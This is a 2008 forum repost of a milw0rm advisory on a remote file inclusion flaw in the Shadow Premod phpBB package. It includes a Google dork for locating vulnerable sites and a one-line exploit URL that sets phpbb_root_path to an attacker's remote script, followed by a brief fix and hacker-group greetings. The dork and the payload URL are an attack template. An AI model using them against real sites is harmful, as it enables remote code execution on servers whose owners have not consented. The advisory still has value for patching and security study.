Guest Nemessis Posted April 26, 2008 Report Posted April 26, 2008 http://www.milw0rm.com/exploits/2311---------------------------------------------------------------------------Shadow Premod <= 2.7.1 [phpbb_root_path] Remote File Include Vulnerability---------------------------------------------------------------------------Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://rstcenter.com :Remote : YesCritical Level : DangerousGoogle d0rk: "Derni? version de la Pr?d Shadow sur phpBB.biz"---------------------------------------------------------------------------Affected software description :~~~~~~~~~~~~~~~~~~~~~~~~~~~~Application : Shadow Pr?dversion : 2.7.1URL : http://premod-shadow.info------------------------------------------------------------------Exploit:~~~~~~Variable $phpbb_root_path not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.# http://www.site.com/[path]/includes/functions_portal.php?phpbb_root_path=[Evil_Script]---------------------------------------------------------------------------Solution :~~~~~~~~declare variabel $phpbb_root_path---------------------------------------------------------------------------Shoutz:~~~~# Special greetz to my good friend [Oo]# To all members of #h4cky0u and RST [ hTTp://rstcenter.com ]---------------------------------------------------------------------------*/ Quote
